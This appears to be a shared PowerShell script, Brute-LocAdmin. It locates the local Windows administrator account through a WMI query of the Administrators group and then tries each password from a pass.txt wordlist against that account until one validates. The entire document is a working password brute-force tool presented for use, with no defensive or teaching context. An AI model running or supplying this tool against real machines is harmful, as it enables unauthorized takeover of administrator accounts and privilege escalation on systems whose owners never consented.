<#.Synopsis Brute-forces local Administrator account, if no name is pro

1.  
2. <#
3. .Synopsis
4. Brute-forces local Administrator account, if no name is provided it will attempt to find this by searching the local administrators group using WMI
5. .DESCRIPTION
6. Brute-forces local Administrator account, if no name is provided it will attempt to find this by searching the local administrators group using WMI
7. .EXAMPLE
8. PS C:\> Brute-LocAdmin -Username Adm-User
9. #>
10. Function Brute-LocAdmin
11. {
12. Add-Type -assemblyname System.DirectoryServices.AccountManagement
13. Function Test-LocAdminCred
14. {
15. Param($username, $password)
16. $computer = $env:COMPUTERNAME
17. $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine)
18. $object = New-Object PSObject | Select-Object Username, Password, IsValid
19. $object.Username = $username;
20. $object.Password = $password;
21. $object.IsValid = $DS.ValidateCredentials($username, $password).ToString();
22. return $object
23. }
24.  
25. if (!$username)
26. {
27. $username = 'Administrator'
28. $admins = Get-WmiObject win32_groupuser
29. $admins = $admins |? {$_.groupcomponent -like '*"Administrators"'}
30.  
31. $admins |% {
32. if (!$_.partcomponent.contains("Win32_Group")) {
33. $_.partcomponent -match ".+Domain\=(.+)\,Name\=(.+)$" > $nul
34. Write-Host "Administrator not provided, found user: $username"
35. $username = $matches[2].trim('"')
36. }
37. }
38. }
39.  
40. $allpasswords = Get-Content pass.txt
41. $counter = 0
42.  
43. foreach ($password in $allpasswords)
44. {
45. $counter++
46. $result = Test-LocAdminCred $username $password
47. $result
48. if (($StopOnSuccess -eq 'True') -and ($result.IsValid -eq 'True')){
49. $break = $true
50. $result
51. }
52. if ($break -eq 'True'){break}
53. }
54. }